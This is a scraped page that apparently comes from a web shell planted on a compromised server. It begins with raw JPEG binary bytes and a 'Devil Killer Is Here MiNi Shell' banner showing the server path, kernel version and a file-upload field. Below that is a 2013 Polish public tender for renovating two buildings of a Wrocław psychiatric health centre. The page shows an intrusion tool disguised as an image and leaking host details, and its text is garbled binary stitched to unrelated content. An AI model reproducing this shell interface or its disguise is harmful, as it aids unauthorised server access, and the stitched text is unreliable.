JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130425/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130425/164948-N-2013.html

<p class="kh_header"><b>Wrocław: 9/REMG/DCZP/2013/P REMONT BUDYNKU G  I  N  DOLNOŚLĄSKIEGO CENTRUM ZDROWIA PSYCHICZNEGO SP. Z O.O</b><br>
<b>Numer ogłoszenia: 164948 - 2013; data zamieszczenia: 25.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląskie Centrum Zdrowia Psychicznego Spółka z ograniczoną odpowiedzialnością , ul. Wybrzeże Józefa Conrada-Korzeniowskiego 18, 50-226 Wrocław, woj. dolnośląskie, tel. 71 77 66 212, faks 71 77 66 229.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dczp.wroclaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Przedsiębiorstwo prowadzące działalność leczniczą.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 9/REMG/DCZP/2013/P REMONT BUDYNKU G  I  N  DOLNOŚLĄSKIEGO CENTRUM ZDROWIA PSYCHICZNEGO SP. Z O.O.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia jest remont budynków N i G stanowiących własność Zamawiającego, posadowionych/zlokalizowanych na nieruchomości Zamawiającego położonej we Wrocławiu pomiędzy ulicami: Wybrzeże  J. C-Korzeniowskiego, Władysława Reymonta,  Józefa  Ignacego Kraszewskiego i Emila Zegadłowicza.
2. Szczegółowy zakres zamówienia określa pkt II.1.
3. Wykonawca dla nadzoru realizacji przedmiotu zamówienia wskaże kierownika budowy/remontu.
Zamawiający dla nadzoru realizacji przedmiotu zamówienia wskaże kierownika nadzoru  budowy/remontu.
4. Przedmiot zamówienia należy wykonać zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623, z późn. zm.) i Polskimi Normami, a użyte materiały powinny spełniać wymogi określone w przepisie art. 10 Prawa budowlanego i przepisach ustawy z dnia 16 kwietnia2004 r. o wyrobach budowlanych (Dz. U. z 2004 r. Nr 92, poz. 881 ze zmianami).
5.Wszystkie nazwy własne urządzeń i materiałów użyte w SIWZ wynikają z treści decyzji Konserwatora Zabytków - do wglądu w siedzibie Zamawiającego.
6.Realizacja przedmiotu zamówienia odbywać będzie się na czynnych budynkach tj. w trakcie hospitalizacji pacjentów Zamawiającego.
7. Przed przystąpieniem do realizacji przedmiotu zamówienia Zamawiający przeszkoli pracowników Wykonawcy z zakresu zagrożeń mogących wystąpić ze strony hospitalizowanych pacjentów w czasie realizacji przedmiotu zamówienia. 
Zadanie nr 1:
Dostawa i wymiana okien  i parapetów wewnętrznych oraz uzupełnienie parapetów zewnętrznych w budynku N
1.Zakres prac zadania nr 1:
1)demontaż starych  okien i parapetów wewnętrznych,
2)dostawa i transport nowych okien  i prapetów wewnętrznych na teren DCZP sp. z o.o.,
3)montaż nowych okien drewnianych /PCV/, jednoramowych,  dwuskrzydłowych, rozwierno uchylnych, z jednym  lufcikiem, w kolorze złotego dębu,
4)montaż  parapetów drewnianych  wewnętrznych, o grubości min. 2,5 cm, w kolorze złotego dębu,
5)obróbka okna :
a)wykonanie tynków  zwykłych wewnętrznych, 
b)przygotowanie powierzchni wewnętrznych pod malowanie farbami  lateksowymi,
c)pomalowanie powierzchni wewnętrznych farbami  lateksowymi,
d)wykonanie tynków  zwykłych zewnętrznych,
6)wywiezienie gruzu z powstałego podczas demontażu okien,
7)uzupełnienie  parapetów zewnętrznych płytką klinkierową ( ok.  2 m).
2.Szczegółowy opis  zadania nr 1 zawiera formularz cenowy - załącznik nr 2.1 do SIWZ.
Zadanie nr 2:
Remont dachu  papowego  budynku N.
1.Informacje o budynku N:
1)budynek jednopiętrowy/ dwukondygnacyjny;
2)dach płaski, o wymiarach 1800 x 1066 cm;
3)aktualne pokrycie dachu  - papowe na podłożu betonowym.
2.Zakres prac zadania nr 2: 
1)usunięcie starego pokrycia dachu papowego,
2)wykonanie nowych pokryć z papy termozgrzewalnej,
3)naprawa podłoża dachowego,
4)naprawa i wymiana obróbek blacharskich, rynien i rur spustowych, 
5)zakup materiałów niezbędnych do wykonania zadania i ich dostarczenie na miejsce realizacji,
6)usunięcie/wywiezienia z terenu DCZP sp. z o.o. starego pokrycia dachowego i obróbek blacharskich.
3.Szczegółowy opis  zadania nr 2  zawiera formularz cenowy - załącznik nr 2.2 do SIWZ.
Zadanie nr 3:
Prace remontowe na oddziale VI  w budynku  G.
1.Zakres prac zadania nr 3:
1)pomalowanie ścian  - farbą lateksowa wysoko zmywalną- kolor do uzgodnienia z Zamawiającym przed rozpoczęciem remontu,
2)pomalowanie sufitów  - farbą lateksową,
3)pomalowanie lamperii  - farbą olejną / mat - kolor do uzgodnienie z Zamawiającym przed rozpoczęciem remontu, 
4)położenie tynku strukturalnego KORNIK - kolor do uzgodnienia z Zamawiającym przed rozpoczęciem remontu, 
5)pomalowanie  drzwi  - farbą olejną, białą z połyskiem;
6)pomalowanie futryn drzwi i futryn prześwietleń  - farbą olejną z połyskiem.
7)skucie starych kafelek na ścianie i położenie nowych kafelek wraz z niezbędnymi listwami wykończeniowymi  - kolor do uzgodnienia z Zamawiającym przed rozpoczęciem remontu,
8)skucie starych kafelek podłogowych i położenie nowych kafelek na podłodze -  kolor do uzgodnienia z Zamawiającym przed rozpoczęciem remontu,
2.Szczegółowy opis  zadania nr 3 zawiera formularz cenowy - załącznik Nr 2.3 do SIWZ.
Zadanie nr 4
Renowacja trzech drzwi wejściowych w budynku  G  wraz z nadświetlami  i  kratami, w tym : 2 drzwi wejściowych do bocznych klatek schodowych wschodniej i zachodniej C i D oraz drzwi wejściowych głównych.
1.Opis drzwi:
1)wymiary:
a.drzwi w wejściu głównym: wymiary:  5,00 m x 2,00 m,  w tym wysokość skrzydeł 3,20 m,
b.drzwi  wejściowe do bocznej, wschodniej klatki schodowej  C: wymiary:  3,00 m x 1,80 m,  w tym wysokość skrzydeł 2,30 m,
c.drzwi wejściowe do  bocznej, zachodniej  klatki schodowej D: wymiary:  3,00 m x 1,80 m,  w tym wysokość skrzydeł 2,30 m,
2)wszystkie drzwi pochodzą z 2 połowy XIX wieku; posiadają podobną budowę techniczną i formę, są z drewna sosnowego, w konstrukcji ramowo płycinowej. Krawędzie płycin, ślemion i innych podziałów dekoracyjnie frezowane i podrzeźbiane. Okucia w części oryginalne mosiężne i stalowe. 
3)w naświetlach znajduję się kraty.   
2.Zakres prac zadania nr 4: 
1)analiza powłok barwnych  - w celu ustalenia pierwotnej kolorystyki drzwi, 
2)oczyszczenie powierzchni Drzwi z powłok lakierniczych  - metodą chemiczną tj. przy użyciu zmywaczy powłok lakierniczych,
3)usunięcie przebarwień drewna - bielenie drewna ,
4)wzmocnienie zdegradowanych partii drewna przez pędzlowanie i iniekcję roztworem ossolanu K lub paraloidu B-72 w ksylenie; 
5)wykonanie impregnacji przeciwgrzybicznej ,
6)wykonanie wszystkich napraw: spękań, odspojeń, wykonanie brakujących profili, przy czym  do rekonstrukcji ubytków należy użyć wysezonowanego drewna oraz kitu i mączki sporządzonych na bazie trocin i żywic sztucznych; 
7)scalenie kolorystyczne wszystkich uzupełnień z lokalnym kolorem drewna bejcami;
8)lakierowanie drewna transparentnym lakierem barwionym w kolorze brązowym lub w innej technologii, zależnie od wyników rozpoznania konserwatorskiego; 
9)wymiana szkła na identyczne szkło bezpieczne/wandaloodporne; 
10)konserwacja elementów metalowych - tj. zawiasów, zamków, klamek, krat;
11)wykonanie dokumentacji konserwatorskiej, (zdjęć przed, po, opis środków użytych itp.).
3.Szczegółowy opis  zadania  nr 4 zawiera formularz cenowy - załącznik nr 2.4 do SIWZ.
Zadanie nr 5:
Dostawa drzwi wejściowych , bocznych, dwuskrzydłowych,  w budynku G (część zachodnia budynku) , identycznych jak istniejące  i wymiana dotychczas istniejących na nowo dostarczone 
1.Zakres prac zadania nr 5:
1)odwzorowanie istniejących drzwi o wymiarach 1560 x 2650 cm, wraz z ościeżnicą, przy czym profilowanie oraz wygląd drzwi należy odtworzyć zgodnie ze stanem istniejącym; 
2)wykonanie drzwi wraz z ościeżnicą z drewna dębowego, dopuszczalne jest drewno sosnowe;
3)zdemontowanie istniejących oryginalnych okuć  /zawiasy zlokalizowane od wewnątrz/ ich oczyszczenie, pomalowanie na kolor kutego żelaza i ponownie zamontowanie, przy czym nowe, stylizowane  okucia  należy dopasować do istniejących;
4)pomalowanie drzwi farbą Nelf Lazur Meranti 72 119 eiche rustikal.
2.Wykonanie  dla drzwi dotychczas istniejących dokumentacji fotograficznej archiwalnej.
3.Szczegółowy opis  zadania  nr 5 zawiera formularz cenowy - załącznik nr 2.5 do SIWZ.
Zadanie nr 6:
Modernizacja dwóch klatek schodowych: wschodniej i zachodniej w budynku G wraz   z jego pięcioma kondygnacjami.
1.Zakres prac zadania nr 6:
1)modernizacja instalacji elektrycznej / dokumentacja techniczna/ przedmiar robót do wglądu u Zamawiającego/ obejmująca:
a)wymianę instalacji elektrycznej na dwóch klatkach schodowych wraz z tablicami rozdzielczymi,
b)wymianę istniejących obwodów WLZ /wewnętrzna linia zasilająca/,
c)ułożenie istniejących obwodów oświetlenia ewakuacyjnego i instalacji oddymiania pod tynkiem, 
d)przeprowadzenie wymagalnych przepisami prawa  pomiarów,
2)przygotowanie dokumentacji powykonawczej instalacji elektrycznej;
3)wykonanie dodatkowych robót remontowych:
a)usunięcie starej farby ze ścian i sufitów,
b)malowanie sufitów farbą wysoko zmywalną, lateksową,
c)malowanie ścian farbą wysoko zmywalną, lateksową oraz lamperii farbą olejną,
d)usunięcie starej instalacji wodnej,
e)skucie części tynków  /opisane w załączniku nr 2.6/,
f)uzupełnienie tynków ścian,
g)zabudowanie przewodów instalacyjnych płytami GKB pojedynczo, jednostronnie,
h)położenie sufitu z płyt GKB w piwnicy,
i)renowacja pochwytu drewnianego,
j)wymiana części pochwytu drewnianego,
k)renowacja i uzupełnienie cokołów drewnianych,
l)renowacja ozdobnych krat zabezpieczających.
2.Szczegółowy opis  zadania nr  6 zawiera formularz cenowy - załącznik nr 2.6 do SIWZ.
Zadanie nr 7:
Malowanie holu wejścia głównego w budynku G.
1.Zakres prac zadania nr 7:
1)pomalowanie sufitu i ścian farbą wysoko zmywalną lateksową -  kolor do uzgodnienie z Zamawiającym przed rozpoczęciem remontu, 
2)położenie tynk strukturalny wewnętrzny baranek o średnicy 1,5mm -  kolor do uzgodnienie z Zamawiającym przed rozpoczęciem remontu. 
2.Szczegółowy opis zadania nr 7 zawiera  formularz cenowy -  załącznik nr 2.7 do SWIZ .
Zadanie nr 8:
Dostawa i wymiana stolarki drewnianej okiennej /okien, parapetów wewnętrznych oraz uzupełnienie parapetów zewnętrznych / w budynku  G.
1.Opis wykonania zadania nr 8:
Nowo wbudowana stolarka okienna we wszystkich otworach okiennych przeznaczonych do wymiany musi odpowiadać następującym wymogom:
1)musi być drewniana, w tym parapety wewnętrzne / wkuwane, min. grubość 2,5 cm/;
2)odzwierciedlać stolarkę istniejącą;
3)musi być tej samej wielkości co w oknach istniejących z podziałem i szprosami, przy czym  proponuje się zastosowanie szprosów-podziałów zamontowanych,  naklejanych na szybach;
4)wymiana stolarki nie może zakłócić kompozycji fasady i musi zachować rys historyczny elewacji budynku G;
5)profile i szerokość ślemion, słupków i szprosów nowej stolarki, w częściach widocznych od zewnątrz muszą powtarzać profile i szerokość w starej stolarce;
6)dopuszcza się możliwość zastosowania szprosów pionowych i poziomych / ruchomych/ nakładanych od zewnątrz i od wewnątrz na tafle szkła;
7)powinna powtórzyć sposób otwierania dotychczasowych - starych skrzydeł okiennych;
8)należy przewidzieć otwierane / uchylne/ naświetla; 
9)należy zastosować szybę tzw. bezpieczną ;
10)w klamkach okien,  poza oknami w piwnicy, należy przewidzieć zamki.
2.Przed złożeniem oferty należy zapoznać się z dokumentacja techniczną i decyzją Miejskiego Konserwatora Zabytków - dokumentacja do wglądu w siedzibie Zamawiającego.
3.Zakres  prac zadania nr 8:
1)wykonanie zadaszenia przed wejściem do budynku G;
2)oznaczenie miejsca wykonania robót;
3)demontaż pojedynczych skrzydeł okiennych;
4)wykucie istniejącej ram okiennej z istniejącego oścież; 
5)osadzenie nowych okien;
6)opiankowanie  przestrzeni pomiędzy oknami a ościeżnicą; 
7)założenie haków kotwiących;
8)uzupełnienie tynków zewnętrznym i wewnętrznym na ościeżach; 
9)malowanie ościeży wewnętrznych kolorem zbliżonym do koloru pomieszczenia, w którym  wymieniono okno;
10)zamontowanie parapetów wewnętrznych;
11)uzupełnienie parapetów zewnętrznych płytką klinkierową /o łącznej długości parapetu 2 m/;
12)usuniecie wykutych ram, starych okien i innych elementów z terenu Spółki.
4.Szczegółowy opis zadania nr 8 zawiera formularz cenowy  - załącznik nr 2.8 do SIWZ.  
II.3. Szczegółowy zakres obowiązków stron i szczegółowy opis przedmiotu zamówienia zostały ujęte w projektach umów stanowiących załączniki nr 4.1 - 4.8 do SIWZ.
II.4.Wykonawca zobowiązany jest zapoznać się z dokumentacją techniczną  dla poszczególnych zadań,  która udostępniona zostanie w siedzibie Zamawiającego, w Dziale Organizacji, Logistyki i Zamówień Publicznych, budynek A, II  piętro - w uzgodnionym terminie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.42.00.00-7, 45.45.31.00-8, 45.45.40.00-4, 45.26.10.00-4, 45.26.19.10-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:
dla zadania nr 1 w wysokości:  1 550,00 zł
dla zadania nr 2 w wysokości:  1 100,00 zł
dla zadania nr 3 w wysokości:  1 500,00 zł
dla zadania nr 4 w wysokości:  1 200,00 zł
dla zadania nr 5 w wysokości:     280,00 zł
dla zadania nr 6 w wysokości:  2 000,00 zł
dla zadania nr 7 w wysokości:     130,00 zł
dla zadania nr 8 w wysokości: 38 400,00 zł
co stanowi 3% (słownie: trzy procent) kwoty netto przeznaczonej przez Zamawiającego na realizacje zadania objętego zamówieniem. 
2.Wadium wnosi się przed upływem terminu składania ofert.
3.Wadium może być wniesione w  następujących formach:
1)pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5  pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z póżn. zm.).
4.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez Zamawiającego: 69 1130 1033 0018 8169 3820 0001
5.W przypadku wnoszenia wadium w formie gwarancji:
1)z treści gwarancji musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta;
2)gwarancja musi być podpisana przez upełnomocnionego przedstawiciela gwaranta;
3)z treści dokumentu gwarancji powinno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu kwoty wadium w okolicznościach określonych przepisami ustawy Pzp
6.Wadium wnoszone w pozostałych formach należy złożyć w formie oryginału w kasie Zamawiającego, w godz. 8:30 - 14:00, najpóźniej do terminu składania ofert. 
7.Do oferty  należy  dołączyć  kserokopię  potwierdzonego  za  zgodność  z oryginałem dokumentu stanowiącego wadium przetargowe. Brak dowodu wniesienia wadium stanowić będzie podstawę wykluczenia Wykonawcy z postępowania.
8.Zwrot  wadium  nastąpi  w  trybie  i  okolicznościach określonych w przepisach ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady : spełnia - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia przez Wykonawcę warunku udziału w postępowaniu odbywać się będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń przy zastosowaniu zasady : spełnia - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>referencje lub protokoły odbioru;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>referencje lub protokół odbioru;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

